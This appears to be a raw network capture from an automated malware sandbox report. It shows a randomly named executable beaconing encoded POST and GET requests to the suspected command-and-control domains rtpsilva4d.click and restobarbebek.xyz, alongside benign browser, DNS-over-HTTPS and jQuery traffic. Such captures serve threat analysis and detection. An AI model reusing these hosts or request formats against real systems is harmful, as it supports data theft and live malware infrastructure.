                                                                                                                                                                            34 | 192.168.2.5 | 50120 | 67.223.117.169 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            Dec 11, 2024 09:42:39.865075111 CET | 836 | OUT | POST /mbcs/ HTTP/1.1
                                                                                                                                                                            Host: www.rtpsilva4d.click
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.rtpsilva4d.click
                                                                                                                                                                            Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=J+GqkxZGxkCVuHlmqk1JVdCD3iFuXidPrWS69k7Iip1u+G27VEqcF/+Uhc+RA8L1yfQjy4ikljhpIawvchshtx+c6HanxoFFBmEKBc3nGfeQZu8DUhh2AeLOCDZgj2tLk+bPd/owwxtY9n86tR4tDsEkoZ5fFuQ5Ta/AtFZN74J6G69yw9W9ibc40GHhFI0V7gaLApXjgzDk1hF8V3zA/A+XUKH+
Dec 11, 2024 09:42:41.071592093 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:42:40 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50122 | 67.223.117.169 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:42:42.517679930 CET | 1757 | OUT | POST /mbcs/ HTTP/1.1
                                                                                                                                                                            Host: www.rtpsilva4d.click
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.rtpsilva4d.click
                                                                                                                                                                            Referer: http://www.rtpsilva4d.click/mbcs/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:42:43.792836905 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:42:43 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50123 | 67.223.117.169 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:42:45.171138048 CET | 552 | OUT | GET /mbcs/?x6lPJLCP=E8uKnHhByG2Tv3dXt0hUXbTg8EJLb11h3Xjfw3eru7l4vir7amLvL6eqi8CHILvLkZwm8qiwgwp5C/0JAU8dkG6IkADn3bpuAlwPLI3cNsyNCOAib3p0DeKOekQmhkdC2g==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.rtpsilva4d.click
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:42:46.377219915 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:42:46 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50124 | 85.159.66.93 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:42:52.593290091 CET | 819 | OUT | POST /jm9b/ HTTP/1.1
                                                                                                                                                                            Host: www.restobarbebek.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.restobarbebek.xyz
                                                                                                                                                                            Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=aq5smm9Kz2tW5AcCBXC8GEWZ3fOp3upLJ+L8aOqwcDonTpYvE+ZLyu2ZD6RBjxXasPaxOFRd3OXP6uqTzj0WhCm72/lauhZSQUvNSw2PnFxpybDBblX2p6YEQybEZb7io93oaPTgZJak2y3N8bMhWViX756pKxy+Geqj/5CHgHXiSSJFBg90hOBqufIQ8diWBSEnB1o=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50125 | 85.159.66.93 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:42:55.239033937 CET | 839 | OUT | POST /jm9b/ HTTP/1.1
                                                                                                                                                                            Host: www.restobarbebek.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.restobarbebek.xyz
                                                                                                                                                                            Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Ascii: x6lPJLCP=aq5smm9Kz2tWoQMCH068AkWe4/Op+OpHJ+H8aLKedwcnSM8vF6NL8O2ZMqRAuRXEsPWDOE9d3ODP6siTzUIXuym53PlYxxZSQUvNS2axnF5pyqzBdwjx1qYHdibEdb7mo92NaOOLZKyk2yHN8KMiYViZjZ7ENAS2fO/u6oHh0xf+Xk4vbC1cyutS+MAnttD/bxUXfi81mU8hMinnvwDx8bTd7odX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50126 | 85.159.66.93 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:42:57.893518925 CET | 1760 | OUT | POST /jm9b/ HTTP/1.1
                                                                                                                                                                            Host: www.restobarbebek.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.restobarbebek.xyz
                                                                                                                                                                            Referer: http://www.restobarbebek.xyz/jm9b/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50127 | 85.159.66.93 | 80 | 4352 | C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 09:43:00.543303967 CET | 553 | OUT | GET /jm9b/?x6lPJLCP=XoRMlRQavUBSvHE6AV2eFSHD1vC94NgmQfaFO5StTzEKBs4nBsZa6I2TGaV3pACayJ+XHXZH2+vi6MzB3UVztjakyssOm3dqQA7FXQmUsXh8tqb4LmqnuepmKmLDXrWJpg==&rJl09=1ZZ8JloHsT HTTP/1.1
Host: www.restobarbebek.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 11, 2024 09:43:01.878988981 CET | 225 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.1
Date: Wed, 11 Dec 2024 08:43:01 GMT
Content-Length: 0
Connection: close
X-Rate-Limit-Limit: 5s
X-Rate-Limit-Remaining: 19
X-Rate-Limit-Reset: 2024-12-11T08:43:06.6549188Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49790 | 172.217.19.225 | 443 | 3648 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 08:39:46 UTC | 594 | OUT | GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-11 08:39:47 UTC | 570 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 138356
X-GUploader-UploadID: AFiumC4J6TCUHaB4vHZh0xUuNyuZTRP74OTuNvyhfX-3NnOS1BLi6LlEqdKyjB_ciY1UI5FxAAbinHU
X-Goog-Hash: crc32c=ld9IFg==
Server: UploadServer
Date: Tue, 10 Dec 2024 16:45:00 GMT
Expires: Wed, 10 Dec 2025 16:45:00 GMT
Cache-Control: public, max-age=31536000
Age: 57287
Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49793 | 172.64.41.3 | 443 | 3648 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 08:39:47 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-11 08:39:48 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Wed, 11 Dec 2024 08:39:47 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f042a8ccb300f5f-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49792 | 172.64.41.3 | 443 | 3648 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 08:39:47 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
                                                                                                                                                                            2024-12-11 08:39:48 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:39:47 GMT
                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            CF-RAY: 8f042a8cca832395-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            2024-12-11 08:39:48 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: wwwgstaticcomA)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49795 | 162.159.61.3 | 443 | 3648 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 08:39:47 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-11 08:39:47 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-11 08:39:48 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Wed, 11 Dec 2024 08:39:47 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f042a8cea2443c7-EWR
alt-svc: h3=":443"; ma=86400
2024-12-11 08:39:48 UTC | 468 | IN | Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49807 | 162.159.61.3 | 443 | 3648 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 08:39:48 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-11 08:39:48 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49806 | 172.64.41.3 | 443 | 3648 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 08:39:48 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-11 08:39:48 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49808 | 172.64.41.3 | 443 | 3648 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 08:39:49 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-11 08:39:49 UTC | 128 | OUT | Data Ascii: edgemicrosoftcom)QM
2024-12-11 08:39:49 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Wed, 11 Dec 2024 08:39:49 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f042a958ac6c360-EWR
alt-svc: h3=":443"; ma=86400
2024-12-11 08:39:49 UTC | 468 | IN | Data Ascii: edgemicrosoftcom-edge-microsoft-comdual-a-0036a-msedgenet0(CC(kC(O)>:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49832 | 151.101.130.137 | 443 | 3788 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 08:39:51 UTC | 307 | OUT | GET /jquery-3.6.3.min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.msn.com/?ocid=iehp
Accept-Language: en-CH
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: code.jquery.com
Connection: Keep-Alive
2024-12-11 08:39:52 UTC | 612 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 89947
Server: nginx
Content-Type: application/javascript; charset=utf-8
Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
ETag: "28feccc0-15f5b"
Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Age: 3271703
Date: Wed, 11 Dec 2024 08:39:51 GMT
X-Served-By: cache-lga21985-LGA, cache-ewr-kewr1740035-EWR
X-Cache: HIT, HIT
X-Cache-Hits: 587, 0
X-Timer: S1733906392.922984,VS0,VE0
Vary: Accept-Encoding
                                                                                                                                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 76 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 45 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 69 66 28 64 2e 63 73 73 53 75 70 70 6f 72 74 73 53 65 6c 65 63 74 6f 72 26 26 21 43 53 53 2e 73 75 70 70 6f 72 74 73 28 22 73 65 6c 65 63 74 6f
                                                                                                                                                                            Data Ascii: )){(f=ee.test(t)&&ve(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=E)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{if(d.cssSupportsSelector&&!CSS.supports("selecto
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 61 29 7b 72 65 74 75 72 6e 20 6c 65 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 2b 6f 2c 6c 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 76 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e
                                                                                                                                                                            Data Ascii: "in e&&e.disabled===t}}function ye(a){return le(function(o){return o=+o,le(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ve(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 53 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72 65 74 75 72 6e 20 6e 3f 5b 6e 5d 3a 5b 5d 7d 7d 29 3a 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65
                                                                                                                                                                            Data Ascii: ?(b.filter.ID=function(e){var t=e.replace(te,ne);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&S){var n=t.getElementById(e);return n?[n]:[]}}):(b.filter.ID=function(e){var n=e.replace
                                                                                                                                                                            2024-12-11 08:39:52 UTC1378INData Raw: 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 52 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 45 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 7e 3d 22 29 2c 28 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 27 27 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22
                                                                                                                                                                            Data Ascii: [selected]").length||y.push("\\["+M+"*(?:value|"+R+")"),e.querySelectorAll("[id~="+E+"-]").length||y.push("~="),(t=C.createElement("input")).setAttribute("name",""),e.appendChild(t),e.querySelectorAll("[name='']").length||y.push("\\["+M+"*name"+M+"*="+M+"
